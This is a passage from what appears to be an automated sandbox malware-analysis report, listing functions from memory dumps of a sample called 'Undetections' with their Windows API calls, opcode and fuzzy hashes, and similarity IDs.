                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb3dca1282fd11cbbbf194d9764015a7e1699eea8b5f43d153edd0d2efd55e8f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D2153B4C043898FCB10DFAAD444ADEFFF4AF49318F20805AD958A7602D339A548CFA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0F0FCD88 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PeekMessageW.USER32(?,?,?,?,?), ref: 0F0FCDF8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MessagePeek
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2222842502-0
                                                                                                                                                                                                            • Opcode ID: 949057d3fc1aa859f495fbaf6e372fbe720151c597fe0bd84d65782348d922e0
                                                                                                                                                                                                            • Instruction ID: 5cc89ac378b3905a88e23a4b5c8d2f0d5b1720e30007907405d282dee490779f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 949057d3fc1aa859f495fbaf6e372fbe720151c597fe0bd84d65782348d922e0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 732117B58002499FDB10CF9AC544BDEBBF8FB08320F10802AE559A3251C378A544CFA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00C2DBE8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00C2E031,00000800,00000000,00000000), ref: 00C2E242
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4082198044.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_c20000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                                                                            • Opcode ID: 472114e0168645cb9b04837082d4e0eb76f26602d526fb95560bc76cccbdd175
                                                                                                                                                                                                            • Instruction ID: efa9ac4ae9eb362d0ad41dabef3157c92617e8c731538ac3100d4ab98cd96b23
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 472114e0168645cb9b04837082d4e0eb76f26602d526fb95560bc76cccbdd175
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD1114B6900258DFDB10CF9AD444ADEFBF8EB48314F10842AD519B7610C375A944CFA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0794BE50 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 0794BEBA
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111219890.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7940000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: TextWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 530164218-0
                                                                                                                                                                                                            • Opcode ID: 1041f243be7ebb775f932438b4540b07bf1e1f99b60bab156d2cfb83992ea0b9
                                                                                                                                                                                                            • Instruction ID: e38e423e8ed1d5b1596d72d168075b7821c1f2d987ed84efa6bec295f985725b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1041f243be7ebb775f932438b4540b07bf1e1f99b60bab156d2cfb83992ea0b9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B61123B6C002498FDB10CF9AC444BDEFBF8EB88324F14C42AD868A7650D378A545CFA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0F0FCD90 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PeekMessageW.USER32(?,?,?,?,?), ref: 0F0FCDF8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MessagePeek
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2222842502-0
                                                                                                                                                                                                            • Opcode ID: f5c2081283d37d199bd3e57c3b1f92796caae5a11cf3e71091307634d22899b4
                                                                                                                                                                                                            • Instruction ID: ff6c97a462ad58fc294ef44e7e1a9820e526e6c98a18030fb03ab65ed579036c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5c2081283d37d199bd3e57c3b1f92796caae5a11cf3e71091307634d22899b4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1511F6B58002499FDB10CF9AD544BDEBBF8EB48320F10842AE559A3651C378AA44CFA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0F0F79D8 Relevance: 1.6, APIs: 1, Instructions: 50comCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0F0F7A35
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Initialize
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2538663250-0
                                                                                                                                                                                                            • Opcode ID: 7fceaa644bbc00a182735c5fe8bcc7a2c3a097794c616f8909b05b6155b0c1a8
                                                                                                                                                                                                            • Instruction ID: 5c6eb2a97118fe7698fd05d95a32ce35f0a22b7cd78e87f05847b3fdfed16a04
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7fceaa644bbc00a182735c5fe8bcc7a2c3a097794c616f8909b05b6155b0c1a8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 491122B58003898FCB20DFAAC444BDEFFF8EB48324F248459D559A7611D379A944CFA6
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0F0F6B9D Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0F0F6BFD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MessagePost
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                                                                                            • Opcode ID: 4ee555b086e706ee13fca14f0d992a09d54a0ed8274b089cd0ea3a8f6f94d90a
                                                                                                                                                                                                            • Instruction ID: 5cf5fae22f389b0f51623cdc48b34bda2a22f49db1908eb08fc0e87c2b5b7089
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ee555b086e706ee13fca14f0d992a09d54a0ed8274b089cd0ea3a8f6f94d90a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 651106B5800249CFDB10CF9AC945BEEBBF4EB48324F14845AE558A3651C379A984CFA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0F0F6BA0 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0F0F6BFD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MessagePost
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                                                                                            • Opcode ID: db8a2f82165fb709efb61c178ad40fe14c05e559cfebfdc697ab8db6b005ff11
                                                                                                                                                                                                            • Instruction ID: c04dc82efee91bffdf909b41f1b93934ab6de77c10b92e4e548e67b1a2128166
                                                                                                                                                                                                            • Opcode Fuzzy Hash: db8a2f82165fb709efb61c178ad40fe14c05e559cfebfdc697ab8db6b005ff11
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D1106B5800349DFDB10CF9AC945BEEFBF8EB48324F108419E558A3651D379A984CFA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0F0FE0C8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SendMessageW.USER32(?,?,?,?), ref: 0F0FE12D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                            • Opcode ID: 9d1b4f50f3224158b1efd2ba488f59eb2cd1577c8241560cebb95519f7003757
                                                                                                                                                                                                            • Instruction ID: fa9c8e5026f8647818cd3a349bffe343c556b43d1ec5d7d901728f1e179da871
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d1b4f50f3224158b1efd2ba488f59eb2cd1577c8241560cebb95519f7003757
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 621125B58003499FCB10DF9AD884BDEFFF8EB48320F248419E558A7211C375A984CFA1
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00C2DB50 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00C2DBB6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4082198044.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_c20000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                                                                                            • Opcode ID: 6a67ca6f2e5e50ff09b269c5627a922b1f4a46be332f0e6849fe66c96e207cd4
                                                                                                                                                                                                            • Instruction ID: e74d16cf0702fc48a6e0254f47a31bdc2c05804aca5201a562822a1b81b0ea71
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a67ca6f2e5e50ff09b269c5627a922b1f4a46be332f0e6849fe66c96e207cd4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F011E0B5C003598FCB10DF9AD444ADEFBF4AB88324F11846AD869B7610C379A545CFA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0F0F6D58 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0F0F7A35
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Initialize
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2538663250-0
                                                                                                                                                                                                            • Opcode ID: bfda0cc93f1228ca556f581aaf956db3c083170f51f0f8fe7ca7001000c42f7d
                                                                                                                                                                                                            • Instruction ID: 9aae2ae2c59e6d4982eb939e50f531374b207340578ec4e87b7b9b135ce688d1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfda0cc93f1228ca556f581aaf956db3c083170f51f0f8fe7ca7001000c42f7d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 731130B09002488FCB20DF9AC448BDEFFF4EB48324F208419E618A7611C379A944CFA6
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0794C692 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SendMessageW.USER32(?,?,?,?), ref: 0794C6F5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111219890.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7940000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                            • Opcode ID: 56d01b2a126a0c719f896f3632bc2c4d55abd8c8da43ec5f780bdf4b2507f08b
                                                                                                                                                                                                            • Instruction ID: df56a90a896535df84183539c81cd1c31739caaa0670bee71feb9fcd8326be82
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56d01b2a126a0c719f896f3632bc2c4d55abd8c8da43ec5f780bdf4b2507f08b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E411F2B58003899FDB10DF9AD484BDEBFF8FB49324F10841AE458A7650C375A544CFA1
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0794C698 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SendMessageW.USER32(?,?,?,?), ref: 0794C6F5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111219890.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7940000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                            • Opcode ID: 77443de624bfad298201e9bd863c75444817a928187ad810ca5759afe39f9156
                                                                                                                                                                                                            • Instruction ID: 7ae945eca76b99d07f44f28837e286f545a7599284d9d0a45a7254fa3a857b84
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77443de624bfad298201e9bd863c75444817a928187ad810ca5759afe39f9156
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E11D3B58003499FDB10DF9AC485BDEBBF8FB48324F108419D558A7610C375A944CFA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0F0FE0D0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SendMessageW.USER32(?,?,?,?), ref: 0F0FE12D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                            • Opcode ID: 98f1cf2edf82d03e93b797b47648d1f7e9a08ffd75e85219df255d85277c9259
                                                                                                                                                                                                            • Instruction ID: e822c5e9c2e4986e7025a218fdd8c0252e305bcc02e007a83b8ab5bfea33fa9e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98f1cf2edf82d03e93b797b47648d1f7e9a08ffd75e85219df255d85277c9259
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 281103B58003489FCB10DF9AD844BDEBBF8FB48320F108419D558A7610C375A944CFA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0F0FD528 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DispatchMessage
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2061451462-0
                                                                                                                                                                                                            • Opcode ID: 3d4507f523115cc12bc925a9368639ef841fc4f9293226bcffa40f428050ae9b
                                                                                                                                                                                                            • Instruction ID: 842bb1b4b6d00a5e0d5d66742feb33722b851104ad9af1525dba540b5b93dc7f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d4507f523115cc12bc925a9368639ef841fc4f9293226bcffa40f428050ae9b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C011DDB5C00649CFCB20DF9AD444BDEFBF4EB48324F10842AE959A7610D379A544CFA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16E2EB51 Relevance: 1.5, APIs: 1, Instructions: 30timeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetTimer.USER32(?,04DDAF30,?,?), ref: 16E2EB7D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4314104630.0000000016E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 16E20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16e20000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Timer
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2870079774-0
                                                                                                                                                                                                            • Opcode ID: 7bd71149a1045d89a2297b3a113dc4850f71a20b6c86af0d1ebddc73e83c2ac9
                                                                                                                                                                                                            • Instruction ID: bab1067e9201d74ae3821f2dafc31cd694fb6348065c62cc7262a273b9041838
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bd71149a1045d89a2297b3a113dc4850f71a20b6c86af0d1ebddc73e83c2ac9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0AF0E2B6800319DFDB10DF89D885BDEBBF4FB58324F10841AE559A7610C379A584CFA1
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16DEDDD8 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                            • API String ID: 0-2766056989
                                                                                                                                                                                                            • Opcode ID: 103eed03ee9daeaec90cfe43afc21770c3360c232e482890c93c078f38f96874
                                                                                                                                                                                                            • Instruction ID: 19238f3a2b76d4924caec0033a093e05f736f04397357d24484f4f1f6767cd68
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 103eed03ee9daeaec90cfe43afc21770c3360c232e482890c93c078f38f96874
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBD1D87590064ACFCF05DFA8C8949DDB7B1FF48314B218659D8066B359EB74AE8ACF80
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16DEDDC8 Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                                                                            • Opcode ID: 03ccf43361755e0d1472f6b48aae096443cd5ee95e8b256c01d9a2378ee1a455
                                                                                                                                                                                                            • Instruction ID: e37381b5ce9931c9f25f1dcc67c67889389f844c7adb4c9c675afd1b0b662985
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 03ccf43361755e0d1472f6b48aae096443cd5ee95e8b256c01d9a2378ee1a455
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DA1EB7590064ACFCF05DFA8C4948DDB7B1FF98314B218655D846AB359EB34AE8ACF80
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FCA9C0 Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: P
                                                                                                                                                                                                            • API String ID: 0-1343716551
                                                                                                                                                                                                            • Opcode ID: c4c049257d184c75c2f21a581d8b1074ca2d031766f82a60daa8a38c78a44c2e
                                                                                                                                                                                                            • Instruction ID: a98218bedcac64e16bbe1dfc3cc0a6cde049565bef9cc6f2848022dfa020b291
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4c049257d184c75c2f21a581d8b1074ca2d031766f82a60daa8a38c78a44c2e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE712C34E0060ACFDB05DF79DA546ADBBB2FF88301F1085ADE946A7350EB38A945CB50
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16DEF488 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: P
                                                                                                                                                                                                            • API String ID: 0-1343716551
                                                                                                                                                                                                            • Opcode ID: 1cc45ab15ee96dffd8a3308ed0aec5c6abda303f443ba3ecd0070e7ba5c8e35d
                                                                                                                                                                                                            • Instruction ID: 4f70f7db2fc94701c58592e86025af168be04692b57eb79b3ee796bcad8aa4a8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1cc45ab15ee96dffd8a3308ed0aec5c6abda303f443ba3ecd0070e7ba5c8e35d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B512D74A01249DFCB15DFA8C990A9EBBF2FF88304F148169E515AB364DB35E856CF80
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16DE6A0C Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: (oq
                                                                                                                                                                                                            • API String ID: 0-3175707579
                                                                                                                                                                                                            • Opcode ID: 55781f620ef390732d2f35c617e27827eb12dc389f2656cd1a323fcb5254ae50
                                                                                                                                                                                                            • Instruction ID: 09179fb12702151b07d822c052a20b42bd6d44895e0b43600308d666224e4147
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55781f620ef390732d2f35c617e27827eb12dc389f2656cd1a323fcb5254ae50
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A141CEB5A042589FDB10CFA9C840AAFBFF9EF89310F14801AE855A7351C735AD05CFA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FCC928 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Hoq
                                                                                                                                                                                                            • API String ID: 0-3049094369
                                                                                                                                                                                                            • Opcode ID: 3c4930c15b4df838ec15b8501e5c9b7c13294f996b23337465f8cf94a3eb7048
                                                                                                                                                                                                            • Instruction ID: a091674724b3c1e48f718feb3c76bbb99e0e91fdf8eecf576fae29293bf1ebaf
